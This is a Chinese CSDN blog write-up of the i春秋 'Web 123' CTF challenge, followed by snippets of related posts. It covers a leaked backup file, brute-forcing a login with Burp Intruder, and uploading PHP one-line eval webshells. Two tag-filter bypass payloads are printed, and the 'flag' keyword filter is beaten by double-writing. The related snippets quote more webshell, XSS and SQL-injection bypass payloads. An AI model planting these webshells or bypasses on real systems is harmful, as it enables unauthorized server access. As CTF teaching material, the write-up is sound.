i春秋-123(文件上传绕过,双写绕过)

于 2024-11-20 23:53:08 发布
阅读量581 收藏 8
点赞数 10
分类专栏: i春秋训练营-Web 文章标签: 蓝桥杯 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79090248/article/details/143927869
版权

练习平台地址

竞赛中心

题目描述

题目内容 

就是一个登录框

F12检查

在源码中发现提示:用户信息都在user.php中且得知默认密码格式

访问user.php

访问成功但没有任何信息

尝试访问看有没有备份文件

访问user.php.bak时成功发现

得到用户名

dpaste/RssCT (Plain Text)

结合密码格式进行爆破(battering ram)

抓取登录包发送到intruder

 添加payload

成功爆破出账号密码(注意年份并不确定是1995,从1980开始测试)

zhangyuzhen

zhangyuzhen1995

成功登录发现提示存在上传漏洞

看起来是上传,取消注释重新开启

 

 尝试上传

上传一句话木马试试

两种绕过姿势

1.绕过<?限制

<script language="php">@eval_r($_POST[cmd])</script>

2.绕过<?pgp ?>限制

<?=eval($_POST['cmd']);

第一种

第二种

上传成功并返回了一个跳转标签,view.php

访问view.php

看起来就是一个查看文件的功能

尝试传值

提示flag被过滤了

尝试双写绕过

后来经过尝试发现是flag,没有后缀名

flag

flag{bb1bef73-b536-475e-ae7a-43c47f2ed2c2} 

28-2 文件上传漏洞 - 绕过
weixin_43263566的博客
03-19 582
在代码编过程中,绕过原理指的是只对黑名单中的内容进行一次空替换。由于只进行一次替换,导致了绕过的情况。具体来说,这种绕过技术可以通过在文件名后面添加额外的字符来实现。例如,将黑名单中的后缀名替换为空,而实际上添加了额外的字符(比如"pph"),使得最终文件后缀名变为。这种方法利用了只替换一次的特性,在绕过黑名单检测的同时保留了原本的文件类型(如。正常的上传一个php文件看看。
i春秋 WEB 123
A_dmin的博客
06-14 1033
i春秋 WEB 123 一天一道CTF题目,能多不能少 打开网页一个登录框,按照惯例查看网页源代码,有所发现: 查看user.php,发现存在但是什么都没有,检查是否存在备份文件~ 发现存在: 下载打开,bp抓包,当做字典进行爆破: 先构造: 最后加入字典进行爆破,年份不对可以一直加,或者减,,,,,总之,暴力就对了 最后得到用户名和密码: zhangyuzhen zhangyuzhen19...
php绕过,任意文件包含漏洞的绕过方式
weixin_35796591的博客
03-10 1203
本文转自行云博客https://www.xy586.top/文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结前期准备file.php代码$a = $_GET['a'];include($a.'.html');?>hack.php代码fputs(fopen('shell.php','w'),'');?>长目录截断原...
PHP短标签、绕过
2401_82985722的博客
03-19 427
文件中包含了PHP代码,但是在上下文中不被允许。(后端利用正则限制匹配PHP,php)上传的文件类型不是有效的 JPEG 图片格式。短标签会直接把php的结果输出,原来的路径中存在php。用pphpph绕过。·这都不做(web)(此题免杀马不可用)连接蚁剑,得flag。
php绕过,PHP preg_系列漏洞小结
weixin_42522575的博客
03-10 1974
最近看 P 神以前的文章,其中在 3 个参数的回调函数中提到了 preg_replace /e 命令执行,对这块不是很熟悉的我特此这篇文章总结学习一下。preg_matchint preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]...
php代码审计:文件上传(后缀名绕过
qq_22132931的博客
10-29 982
php代码审计:文件上传(后缀名绕过
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1422
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:想怎么传就怎么传,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上传输入框 明显是文件上传漏洞 方法一:上传木马 上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小绕过php的过
i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
椰奶冻不安全的博客
07-05 1107
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍 题目内容:12341234,然后就解开了 本题来自擂主C26 题目链接请在i春秋申请 login.php 源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了 常见的Web源码泄露漏洞 git源码泄露 Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等 s
WEB漏洞-文件操作
weixin_46544151的博客
04-26 2140
目录 31、文件操作之文件包含漏洞全解 一、本地文件包含代码测试——原理 1.无限制包含漏洞文件 ​2.有限制文件包含漏洞 二、远程文件包含代码测试——原理 1.无限制 2.有限制 三、各种协议流提交流测试-协议 四、某CMS程序文件包含利用-黑盒(ekucms) 五、CTF-南邮大学,i春秋百度杯真题-白盒 1.南邮CTF 2.i春秋-CTF 31、文件操作之文件包含漏洞全解 一、本地文件包含代码测试——原理 1.无限制包含漏洞文件 在phpstudy根目录下创建inc
春秋云镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
最新发布
Dark-Specter的博客
03-25 2713
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
文件上传--Upload-labs--Pass10--绕过
2302_79800344的博客
02-19 1077
绕过str_ireplace()函数
【CTFHub】 文件上传绕过
cx_sam的博客
08-06 2805
CTFHub WEB 文件上传
i春秋-ctf 文件上传
AAAAAAAAAAAA66的博客
11-08 9270
文章目录 前言 一、题目 二、解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。 目录 文章目录 一、题目进入环境。 二、解题步骤 1.我的错误思路 2.​​​​​​正确解题姿势 总结 一道普通的文件上传题,通过一天的思考我得到这类题目的思路总结。 提示:以下是本篇文章正文内容,下
i春秋 upload
慢慢变小佬的博客
08-11 1837
 打开题目链接: 可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去; 试着上传一句话; 当上传一句话木马时,上传成功后,原文件变成了如下: 把&lt;?和php过滤掉了,再上传另一个一句话;  &lt;script language="PHP"&gt;  @eval($_POST["code"]); &lt;/script&gt; 上传后连接菜刀;   ...
第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传
weixin_44722125的博客
05-14 2809
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or的两边要有单引号,使它变成password=‘xxx’ or 'xxx’的形式,那么可以根据32位16进制的字符串来查找‘or’对应的16进制是276f7227,所以我们的目标就是要找一个字符串取3...
i春秋-CTF
爆破胡同的博客
01-19 3387
VID 查看网页源代码发现有个文件路径 访问的看到了有三个参数用get方式提交 在url后提三个参数和对应的值就看到了一个1chunqiu.zip 访问就可以下载文件 这里需要进行代码审计 先看log.php界面if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['numb
i春秋web 想怎么传就怎么传,就是这么任性。
enginers的博客
05-20 268
文件上传题,可联想到一句话木马 通过抓包知道上传的文件到u/flag.php里面,然后就可以木马上传了 上传成功后访问上传的文件,发现直接输出了 eval($_POST[‘a’]) ?> 即被过滤了,查了一下网上有一种法 连接蚁剑,成功 ...
多次 - BugKuCTF(SQL注入绕过
小水池
09-14 9307
登陆后发现页面没有啥信息,但是url地址栏?id=1 可能存在注入 id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入 ?id=1'or 1=1--+ 也报错,可能存在过滤 尝试绕过,?id=1'oorr 1=1--+ 返回正常 那如何检测哪些字符串被过滤了呢?新技能GET! 异或注入了解一下,两个条件相同(同真或同假)即为假 http://120....
XSS通关小游戏以及我的挑战思路分享(XSS绕过代码)
qq_42133828的博客
10-13 2359
level1 这一关是一个很简单的测试,直接在url上改一下标签就行了。 payload如下: 127.0.0.1/XSS/level1.php?name=&lt;script&gt;alert(1)&lt;/script&gt; level2 这一关是一个比较典型的搜索框XSS,只需要构造一下闭合语句,将input语句&lt;input name=keyword value="123...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值